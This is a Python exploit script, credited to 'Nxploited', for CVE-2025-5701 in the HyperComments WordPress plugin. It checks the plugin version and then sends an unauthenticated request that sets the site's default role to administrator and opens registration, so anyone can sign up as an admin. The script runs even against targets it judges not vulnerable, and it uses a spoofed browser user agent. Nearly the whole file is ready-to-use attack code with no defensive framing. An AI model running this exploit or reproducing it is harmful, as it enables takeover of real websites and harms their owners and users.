import requests
import argparse
import time
import sys
from urllib.parse import urlparse

# Exploit By : Khaled ALenazi (Nxploited )

requests.packages.urllib3.disable_warnings()

def banner():
    print("\nCVE-2025-5701 - Unauthenticated Privilege Escalation Exploit")
    print("By: Khaled Alenazi (Nxploited)\n")

def check_version(base_url):
    readme_url = base_url.rstrip('/') + '/wp-content/plugins/hypercomments/readme.txt'
    try:
        response = requests.get(readme_url, timeout=10, verify=False, headers={"User-Agent": user_agent})
        if response.status_code == 200:
            if 'Stable tag:' in response.text:
                for line in response.text.splitlines():
                    if 'Stable tag:' in line:
                        version = line.split('Stable tag:')[1].strip()
                        if version <= "1.2.2":
                            print(f"[+] Target is vulnerable (version: {version}) - proceeding with exploitation.")
                            return True
                        else:
                            print(f"[-] Target is not vulnerable (version: {version}) - attempting exploitation anyway.")
                            return False
            print("[!] Version string not found in readme.txt - attempting exploitation anyway.")
            return False
        else:
            print("[!] readme.txt not found - proceeding cautiously.")
            return False
    except Exception as e:
        print(f"[!] Error checking readme.txt: {e}")
        return False

def verify_path(base_url):
    test_url = base_url.rstrip('/') + '/wp-admin/index.php?hc_action=update_options'
    try:
        response = requests.options(test_url, timeout=10, verify=False, headers={"User-Agent": user_agent})
        if response.status_code in [200, 405]:
            print("[+] Exploit endpoint is accessible.")
            return True
        else:
            print("[-] Exploit endpoint not found.")
            return False
    except Exception as e:
        print(f"[!] Failed to verify exploit path: {e}")
        return False

def Exploit_Nxploited(base_url):
    endpoint = base_url.rstrip('/') + '/wp-admin/index.php?hc_action=update_options'
    data = {
        "data": '{"default_role":"administrator","users_can_register":"1"}'
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": user_agent
    }

    try:
        time.sleep(3)  # Silent wait
        response = requests.post(endpoint, data=data, headers=headers, verify=False, timeout=10)
        if response.status_code == 200 and "success" in response.text:
            print(f"[+] Server response: {response.text.strip()}")
            print(f"[+] Registration is now enabled. New users will be assigned administrator role.")
            print(f"[+] Register here: {base_url.rstrip('/')}/wp-login.php?action=register")
        else:
            print(f"[-] Exploit failed. HTTP {response.status_code} - {response.text}")
    except Exception as e:
        print(f"[!] Exploit request failed: {e}")

    print("\nExploit by: Khaled Alenazi (Nxploited)")

def validate_url(url):
    parsed = urlparse(url)
    if not parsed.scheme:
        test_https = "https://" + url
        try:
            requests.get(test_https, timeout=5, verify=False)
            return test_https
        except requests.exceptions.RequestException:
            return "http://" + url
    return url

if __name__ == "__main__":
    banner()
    parser = argparse.ArgumentParser(
        description="CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)"
    )
    parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://site.com)")
    args = parser.parse_args()

    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    base_url = validate_url(args.url)

    check_version(base_url)
    if verify_path(base_url):
        Exploit_Nxploited(base_url)